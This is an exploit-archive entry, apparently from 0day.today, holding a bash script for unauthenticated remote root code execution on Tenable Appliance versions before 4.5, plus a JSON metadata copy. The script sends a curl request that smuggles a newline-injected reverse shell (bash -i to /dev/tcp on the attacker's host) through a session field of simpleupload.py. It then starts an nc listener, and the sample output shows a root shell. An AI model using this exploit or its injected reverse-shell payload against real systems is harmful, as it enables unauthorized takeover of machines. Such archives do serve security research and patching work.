ID 1337DAY-ID-27616
Type zdt
Reporter agix
Modified 2017-04-19T00:00:00
Description
Exploit for linux platform in category remote exploits
#!/bin/bash
: '
According to http://static.tenable.com/prod_docs/upgrade_appliance.html they
fixed two security vulnerabilities in the web interface in release 4.5 so I
guess previous version are also vulnerable.
# Exploit Title: Unauthenticated remote root code execution on Tenable Appliance
# Date: 18/04/17
# Exploit Author: agix
# Vendor Homepage: https://www.tenable.com/
# Version: < 4.5
# Tested on: Tenable Appliance 3.5
tenable $ ./rce.sh
bash: no job control in this shell
bash-3.2# ls
app
appliancelicense.html
appliancelicense.pdf
appliancelicense.txt
images
includes
index.ara
js
lcelicense.html
lcelicense.pdf
lcelicense.txt
migrate
nessuslicense.html
nessuslicense.pdf
nessuslicense.txt
password.ara
pvslicense.html
pvslicense.pdf
pvslicense.txt
sclicense.html
sclicense.pdf
sclicense.txt
simpleupload.py
static
bash-3.2# id
uid=0(root) gid=0(root)
bash-3.2#
'
#!/bin/bash
TENABLE_IP="172.16.171.179"
YOUR_IP="172.16.171.1"
LISTEN_PORT=31337
curl -k "https://$TENABLE_IP:8000/simpleupload.py" --data $'returnpage=/&action=a&tns_appliance_session_token=61:62&tns_appliance_session_user=a"\'%0abash -i >%26 /dev/tcp/'$YOUR_IP'/'$LISTEN_PORT' 0>%261%0aecho '&
nc -l -p $LISTEN_PORT
# 0day.today [2018-01-01] #
{"sourceData": "#!/bin/bash\r\n: '\r\nAccording to http://static.tenable.com/prod_docs/upgrade_appliance.html they\r\nfixed two security vulnerabilities in the web interface in release 4.5 so I\r\nguess previous version are also vulnerable.\r\n \r\n# Exploit Title: Unauthenticated remote root code execution on Tenable Appliance\r\n# Date: 18/04/17\r\n# Exploit Author: agix\r\n# Vendor Homepage: https://www.tenable.com/\r\n# Version: < 4.5\r\n# Tested on: Tenable Appliance 3.5\r\n \r\ntenable $ ./rce.sh\r\nbash: no job control in this shell\r\nbash-3.2# ls\r\napp\r\nappliancelicense.html\r\nappliancelicense.pdf\r\nappliancelicense.txt\r\nimages\r\nincludes\r\nindex.ara\r\njs\r\nlcelicense.html\r\nlcelicense.pdf\r\nlcelicense.txt\r\nmigrate\r\nnessuslicense.html\r\nnessuslicense.pdf\r\nnessuslicense.txt\r\npassword.ara\r\npvslicense.html\r\npvslicense.pdf\r\npvslicense.txt\r\nsclicense.html\r\nsclicense.pdf\r\nsclicense.txt\r\nsimpleupload.py\r\nstatic\r\nbash-3.2# id\r\nuid=0(root) gid=0(root)\r\nbash-3.2#\r\n'\r\n \r\n#!/bin/bash\r\n \r\nTENABLE_IP=\"172.16.171.179\"\r\nYOUR_IP=\"172.16.171.1\"\r\nLISTEN_PORT=31337\r\n \r\n \r\ncurl -k \"https://$TENABLE_IP:8000/simpleupload.py\" --data $'returnpage=/&action=a&tns_appliance_session_token=61:62&tns_appliance_session_user=a\"\\'%0abash -i >%26 /dev/tcp/'$YOUR_IP'/'$LISTEN_PORT' 0>%261%0aecho '&\r\nnc -l -p $LISTEN_PORT\n\n# 0day.today [2018-01-01] #", "description": "Exploit for linux platform in category remote exploits", "sourceHref": "https://0day.today/exploit/27616", "reporter": "agix", "href": "https://0day.today/exploit/description/27616", "type": "zdt", "viewCount": 10, "references": [], "lastseen": "2018-01-01T15:08:46", "published": "2017-04-19T00:00:00", "cvelist": [], "id": "1337DAY-ID-27616", "modified": "2017-04-19T00:00:00", "title": "Tenable Appliance < 4.5 - Unauthenticated Remote Root Code Execution Exploit", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": -1.4, "vector": "NONE", "modified": "2018-01-01T15:08:46", "rev": 2}, "dependencies": {"references": [{"type": "exploitpack", "idList": ["EXPLOITPACK:7FEAC1003ED794DB62A3CA4F8B075666"]}, {"type": "zdt", "idList": ["1337DAY-ID-33843"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156015"]}], "modified": "2018-01-01T15:08:46", "rev": 2}, "vulnersScore": -1.4}}
{}
